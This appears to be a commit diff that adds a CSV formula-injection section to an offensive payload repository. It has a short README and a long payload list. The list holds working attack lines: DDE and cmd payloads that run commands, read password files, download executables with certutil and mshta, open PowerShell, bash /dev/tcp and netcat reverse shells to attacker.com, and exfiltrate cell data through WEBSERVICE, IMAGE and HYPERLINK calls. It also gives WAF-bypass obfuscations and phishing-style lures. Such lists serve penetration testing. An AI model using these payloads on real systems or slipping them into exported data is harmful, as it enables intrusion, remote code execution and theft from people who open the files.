Add NoSQL, CSV, File Upload vulnerabilities and enhance Command Injection

Co-authored-by: Stalin-143 <161853795+Stalin-143@users.noreply.github.com>

CSV-Injection/README.md

@@ -0,0 +1,42 @@
+# CSV Injection (Formula Injection)
+
+## Description
+CSV Injection (also known as Formula Injection) is a vulnerability that occurs when websites embed untrusted input inside CSV files. When a spreadsheet application (like Microsoft Excel, LibreOffice Calc, or Google Sheets) opens a CSV file containing malicious formulas, it may execute the formulas, leading to arbitrary command execution, information disclosure, or other attacks.
+
+## Common Attack Vectors
+- Export functionality (user data, reports, analytics)
+- Contact forms that export to CSV
+- User profile data exports
+- Order history exports
+- Any feature that generates downloadable CSV files
+- Import/Export features in CRM systems
+- Billing and invoice downloads
+- Survey results exports
+
+## Testing Approach
+Submit formula characters (=, +, -, @, \t, \r) followed by commands or formulas in:
+- Name fields
+- Address fields
+- Comment/description fields
+- Any user-controllable data that might be exported to CSV
+
+## Risk Impact
+- Remote code execution via DDE (Dynamic Data Exchange)
+- Information disclosure (reading local files)
+- SSRF (Server-Side Request Forgery)
+- Credential theft
+- Malware distribution
+
+## Common Vulnerable Patterns
+- Direct export of user input to CSV without sanitization
+- Missing CSV encoding/escaping
+- Lack of formula character stripping
+- Client-side only validation
+
+## Payloads
+See `csv-injection-payloads.txt` for a comprehensive list of CSV injection payloads covering:
+- Formula injection techniques
+- DDE (Dynamic Data Exchange) attacks
+- Command execution payloads
+- Data exfiltration methods
+- Multi-application compatibility

CSV-Injection/csv-injection-payloads.txt

@@ -0,0 +1,328 @@
+# CSV Injection Payloads (Formula Injection) - 2020-2025
+
+# ============================
+# Basic Formula Injection
+# ============================
+
+# Equals Formula
+=1+1
+=1+2+3
+=SUM(1+1)
+=2+5+cmd|' /C calc'!A0
+="string"
+=CMD|' /C powershell IEX(wget attacker.com/shell.ps1)'!A0
+
+# Plus Formula
++1+1
++cmd|'/c calc'!A1
++DDE("cmd";"/c calc";"!")
+
+# Minus Formula
+-1+1
+-cmd|'/c calc'!A1
+-DDE("cmd";"/c calc";"!")
+
+# At Symbol Formula
+@sum(1+1)
+@SUM(A1:A10)
+
+# Tab Character
+	=1+1
+	+1+1
+	-1+1
+	@sum(1+1)
+
+# Carriage Return
+=1+1
++=1+1
+
+# ============================
+# DDE (Dynamic Data Exchange) Attacks
+# ============================
+
+# Basic DDE - Command Execution
+=DDE("cmd";"/c calc";"!")
+=DDE("cmd";"/c calc.exe";"!")
+=DDE("cmd";"/c powershell";"!")
+=DDE("cmd";"/c cmd";"!")
+
+# DDE - File Reading
+=DDE("cmd";"/c type C:\Windows\System32\drivers\etc\hosts";"!")
+=DDE("cmd";"/c type C:\Users\*\Desktop\passwords.txt";"!")
+=DDE("cmd";"/c dir C:\";"!")
+
+# DDE - Information Disclosure
+=DDE("cmd";"/c whoami";"!")
+=DDE("cmd";"/c hostname";"!")
+=DDE("cmd";"/c ipconfig";"!")
+=DDE("cmd";"/c net user";"!")
+=DDE("cmd";"/c systeminfo";"!")
+
+# DDE - Data Exfiltration
+=DDE("cmd";"/c curl http://attacker.com?data=$(whoami)";"!")
+=DDE("cmd";"/c powershell -c Invoke-WebRequest -Uri http://attacker.com -Method POST -Body (Get-Content C:\passwords.txt)";"!")
+=DDE("cmd";"/c certutil -urlcache -split -f http://attacker.com/shell.exe C:\temp\shell.exe";"!")
+
+# DDE - Reverse Shell
+=DDE("cmd";"/c powershell -nop -c \"$client = New-Object System.Net.Sockets.TCPClient('attacker.com',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"";"!")
+
+# ============================
+# Excel HYPERLINK Function
+# ============================
+
+=HYPERLINK("http://attacker.com","Click here")
+=HYPERLINK("http://attacker.com?cookie="&A1,"Click")
+=HYPERLINK("file:///C:/Windows/System32/calc.exe","Click to update")
+=HYPERLINK(CONCATENATE("http://attacker.com/",A1),"Link")
+
+# ============================
+# IMPORTXML / WEBSERVICE Functions
+# ============================
+
+=IMPORTXML("http://attacker.com/xxe.xml","//data")
+=IMPORTXML(CONCAT("http://attacker.com?data=",A1),"//data")
+=WEBSERVICE("http://attacker.com")
+=WEBSERVICE(CONCAT("http://attacker.com?leak=",A1))
+
+# ============================
+# Obfuscation Techniques
+# ============================
+
+# Using CHAR function to hide commands
+=CHAR(61)&"DDE(""cmd"";""/c calc"";""!"")"
+=CONCATENATE(CHAR(61),"1+1")
+=CHAR(61)&CHAR(68)&CHAR(68)&CHAR(69)&"(""cmd"";""/c calc"";""!"")"
+
+# Using string concatenation
+="="&"1+1"
+=CONCATENATE("=","1+1")
+="="&"DDE(""cmd"";""/c calc"";""!"")"
+
+# Double encoding
+==1+1
+=+1+1
+=   =1+1
+
+# Null byte injection
+=1+1%00
+=DDE("cmd";"/c calc";"!")%00
+
+# Unicode characters
+＝1+1
+﹢1+1
+⁼1+1
+
+# Whitespace obfuscation
+= 1+1
+=  1+1
+=	1+1
+
+# ============================
+# Cross-Application Payloads
+# ============================
+
+# LibreOffice Calc
+=SHELL("calc")
+=SHELL("gnome-calculator")
+=SHELL("xterm -e bash")
+=SHELL("wget http://attacker.com/shell.sh -O /tmp/shell.sh && bash /tmp/shell.sh")
+
+# Google Sheets
+=IMAGE("http://attacker.com/track.png")
+=IMAGE("https://attacker.com/"&A1)
+=IMPORTDATA("http://attacker.com/data.csv")
+=IMPORTFEED("http://attacker.com/feed")
+=IMPORTHTML("http://attacker.com","table",1)
+=IMPORTRANGE("spreadsheet-id","Sheet1!A1:B10")
+
+# ============================
+# Advanced Techniques (2023-2025)
+# ============================
+
+# Chained formulas
+=IF(A1="admin",DDE("cmd";"/c calc";"!"),"safe")
+=IF(ISNUMBER(SEARCH("admin",A1)),WEBSERVICE("http://attacker.com"),"")
+
+# Nested functions
+=SUM(DDE("cmd";"/c calc";"!"))
+=CONCATENATE(DDE("cmd";"/c whoami";"!"))
+
+# Conditional execution
+=IF(1=1,DDE("cmd";"/c calc";"!"),1)
+=IFERROR(DDE("cmd";"/c calc";"!"),1)
+
+# ============================
+# Context-Aware Payloads
+# ============================
+
+# Name field
+=DDE("cmd";"/c calc";"!")
++DDE("cmd";"/c calc";"!")
+-DDE("cmd";"/c calc";"!")
+@DDE("cmd";"/c calc";"!")
+
+# Email field
+test@test.com=DDE("cmd";"/c calc";"!")
+=WEBSERVICE("http://attacker.com")@test.com
+
+# Comment field
+Great product! =DDE("cmd";"/c calc";"!")
+Review: +cmd|'/c calc'!A1
+
+# ============================
+# Payload Variations for WAF Bypass
+# ============================
+
+# Mixed case
+=dDe("cmd";"/c calc";"!")
+=DdE("cmd";"/c calc";"!")
+
+# Alternative quotes
+=DDE('cmd';'/c calc';'!')
+=DDE(`cmd`;`/c calc`;`!`)
+
+# Line breaks
+=DDE("cmd";
+"/c calc";
+"!")
+
+# Tabs and spaces
+=DDE(	"cmd"	;	"/c calc"	;	"!"	)
+
+# ============================
+# Platform-Specific Payloads
+# ============================
+
+# Windows
+=cmd|'/c calc'!A1
+=cmd|'/c powershell -c "Start-Process calc"'!A1
+=cmd|'/c mshta http://attacker.com/payload.hta'!A1
+=cmd|'/c certutil -urlcache -split -f http://attacker.com/bad.exe bad.exe && bad.exe'!A1
+=cmd|'/c wmic process call create "calc.exe"'!A1
+=cmd|'/c reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall'!A1
+
+# Linux/Unix
+=SHELL("calc")
+=SHELL("xcalc")
+=SHELL("xterm")
+=SHELL("/bin/bash -i >& /dev/tcp/attacker.com/4444 0>&1")
+=SHELL("curl http://attacker.com/shell.sh | bash")
+=SHELL("nc attacker.com 4444 -e /bin/sh")
+
+# macOS
+=SHELL("open /Applications/Calculator.app")
+=SHELL("osascript -e 'tell application \"Calculator\" to activate'")
+=SHELL("curl http://attacker.com/payload.sh | sh")
+
+# ============================
+# Data Exfiltration Payloads
+# ============================
+
+# Exfiltrate cell data
+=WEBSERVICE("http://attacker.com?data="&A1)
+=HYPERLINK("http://attacker.com?token="&B2,"Update")
+=IMAGE("http://attacker.com/track.gif?user="&C3)
+
+# Exfiltrate multiple cells
+=WEBSERVICE("http://attacker.com?u="&A1&"&p="&B1)
+=CONCATENATE("http://attacker.com/",A1,"/",B1,"/",C1)
+
+# ============================
+# Denial of Service
+# ============================
+
+# Resource exhaustion
+=SUM(1:1048576)
+=IF(A1<>"",$A$1:$XFD$1048576,"")
+=VLOOKUP(A1,$A$1:$XFD$1048576,1,FALSE)
+
+# Circular references
+=A1
+(in cell A1 itself, causes circular reference)
+
+# ============================
+# Remote File Inclusion
+# ============================
+
+=IMPORTXML("http://attacker.com/xxe.xml","//data")
+=IMPORTHTML("http://attacker.com/malicious.html","table",1)
+=IMPORTFEED("http://attacker.com/rss")
+=IMPORTDATA("http://attacker.com/data.txt")
+
+# ============================
+# XXE via CSV (when parsed as XML internally)
+# ============================
+
+=IMPORTXML("data:text/xml,<!DOCTYPE foo [<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]><foo>&xxe;</foo>","//foo")
+
+# ============================
+# Social Engineering Payloads
+# ============================
+
+Please verify your account: =HYPERLINK("http://phishing.com","Click Here")
+Congratulations! You won: =DDE("cmd";"/c calc";"!")
+URGENT - Security Update Required =cmd|'/c powershell iex(wget attacker.com/malware.ps1)'!A1
+Invoice #12345 =WEBSERVICE("http://attacker.com/log")
+
+# ============================
+# Polyglot Payloads
+# ============================
+
+=1+1';alert(document.domain)//
+=DDE("cmd";"/c calc";"!")||'<script>alert(1)</script>
++cmd|'/c calc'!A1'"><img src=x onerror=alert(1)>
+
+# ============================
+# Null Cell Reference
+# ============================
+
+=A0
+=DDE("cmd";"/c calc";"!")!A0
+=cmd|'/c powershell'!A0
+
+# ============================
+# Format Confusion
+# ============================
+
+"=1+1"
+'=1+1
+`=1+1
+´=1+1
+
+# ============================
+# Batch CSV Injection (Multiple Rows)
+# ============================
+
+# First row normal, second row malicious
+Normal User,user@email.com,Regular Comment
+Hacker,=DDE("cmd";"/c calc";"!"),Malicious
+
+# ============================
+# CSV Injection in Different Contexts
+# ============================
+
+# In URL parameters
+?name==DDE("cmd";"/c calc";"!")
+?search=+cmd|'/c calc'!A1
+
+# In JSON (if converted to CSV)
+{"name": "=DDE(\"cmd\";\"/c calc\";\"!\")"}
+
+# In XML (if converted to CSV)
+<name>=cmd|'/c calc'!A1</name>
+
+# ============================
+# Time-Delayed Payloads
+# ============================
+
+=IF(NOW()>DATE(2024,1,1),DDE("cmd";"/c calc";"!"),1)
+=IF(TODAY()=WEEKDAY(1),WEBSERVICE("http://attacker.com"),1)
+
+# ============================
+# Modern Framework Specific (2024-2025)
+# ============================
+
+# When exported from web applications
+=WEBSERVICE(CONCAT("http://attacker.com/?cookie=",CELL("filename")))
+=HYPERLINK("javascript:alert(document.cookie)","click")
+=@SUM(A1:A1000)*WEBSERVICE("http://attacker.com")